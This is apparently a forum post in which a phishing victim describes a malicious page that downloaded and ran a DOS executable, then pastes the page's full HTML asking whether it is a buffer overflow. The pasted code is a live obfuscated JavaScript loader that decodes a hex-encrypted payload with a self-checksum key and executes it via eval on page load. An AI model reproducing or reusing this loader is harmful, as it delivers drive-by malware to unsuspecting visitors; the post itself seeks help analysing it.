I just received a phishing fake google adwords email.
I went to the root of the site to see if it was just one page that was dodgy or the whole site. An error box popped up telling me that c:\nywdm.exe had crashed.
On closer inspection it looks like opening the page downloaded a 16 bit dos exe.
At the moment I have no av. only just reformatted my hdd.
I am assuming that all is ok as the program fell over but i dont understand how it downloaded itself and tried to execute with out my permission.
I did a tracert for the site and have asked the hosting company at that ip address to shut the site down. They are russian so i can only hope that they can understand english
The source code for the site is as follows- is it an attempt at buffer overflow (beyond my ken)
thanks in advance
<html>
<body><h1> Loading... Please wait</h1>
<script language="JavaScript">
<!--
function x712b7j66(dPjAxoy7W,GD7Fr0618){var H7aqYJtto;var y6DbFO7y5;var RDJNQ7677='';var EsWQ77JXj=new Array();var CSED2elvW=arguments.callee.toString();var X1O4ikfhM=CSED2elvW.replace(/\W/g,'');X1O4ikfhM=X1O4ikfhM.toUpperCase();var onjDb2BBv=X1O4ikfhM.length;for(H7aqYJtto=0;H7aqYJtto<256;H7aqYJtto++) {EsWQ77JXj[H7aqYJtto]=0;}var BW0woN8C2=1;for(H7aqYJtto=128;H7aqYJtto;H7aqYJtto>>=1) {BW0woN8C2=(BW0woN8C2>>>1)^((BW0woN8C2&1)?3988292384:0);for(jY3GV0SXH=0;jY3GV0SXH<256;jY3GV0SXH+=H7aqYJtto*2) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]=(EsWQ77JXj[jY3GV0SXH]^BW0woN8C2);if (EsWQ77JXj[jY3GV0SXH+H7aqYJtto] < 0) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]+=4294967296;}}}y6DbFO7y5=4294967295;var N0G2HsE12='MAYBE---';for(BW0woN8C2=0;BW0woN8C2<onjDb2BBv;BW0woN8C2++) {y6DbFO7y5=EsWQ77JXj[(y6DbFO7y5^X1O4ikfhM.charCodeAt(BW0woN8C2))&255]^((y6DbFO7y5>>8)&16777215);}y6DbFO7y5=y6DbFO7y5^4294967295;if (y6DbFO7y5<0) {y6DbFO7y5+=4294967296;}y6DbFO7y5=y6DbFO7y5.toString(16).toUpperCase();var D72ue5eUj=8-y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<D72ue5eUj;H7aqYJtto++) {y6DbFO7y5='0'+y6DbFO7y5;}var Ss1888mUw=new Array();var K7cbv55yT=100;var onjDb2BBv=y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<8;H7aqYJtto++) {var oQjX53QIs=onjDb2BBv+H7aqYJtto;if (oQjX53QIs>=8) {oQjX53QIs=oQjX53QIs-8;Ss1888mUw[H7aqYJtto]=y6DbFO7y5.charCodeAt(oQjX53QIs);} else {Ss1888mUw[H7aqYJtto]=7;}}var sYFrNoxca=0;var IJKsc8LMP;K7cbv55yT=10394;var LUq0gF2Xb=new Array();LUq0gF2Xb[0]=dPjAxoy7W.length;onjDb2BBv=LUq0gF2Xb[0];for(H7aqYJtto=0;H7a
qYJtto<onjDb2BBv;H7aqYJtto+=2){var Xb2QH4W1X=dPjAxoy7W.substr(H7aqYJtto,2);var RkI21Ucj4=parseInt(Xb2QH4W1X,16);IJKsc8LMP=RkI21Ucj4-Ss1888mUw[sYFrNoxca];if(IJKsc8LMP<0) {IJKsc8LMP=IJKsc8LMP+256;}RDJNQ7677+=String.fromCharCode(IJKsc8LMP);if(sYFrNoxca<Ss1888mUw.length-1) {sYFrNoxca++;} else {sYFrNoxca=0;K7cbv55yT=11;}}eval(RDJNQ7677);}
x712b7j66('97A197ad9fA9a1b761A9A6A1A6a95B6a6f9b9aaa93B19863A6a4977554ACa7B7a36C6367677C
61796860666b6b72667296999d6594adA172a0939dA460a79aAC72A271ACA1B659ac70625658a9ad9
7b79B6f566954649Ba89C999Cac6F66646553a5A8b19eA9706595a1a69c97B66d6363a2ac5A708062
AC99A495a597825A6c6E');
//-->
</script>
</body>
</html>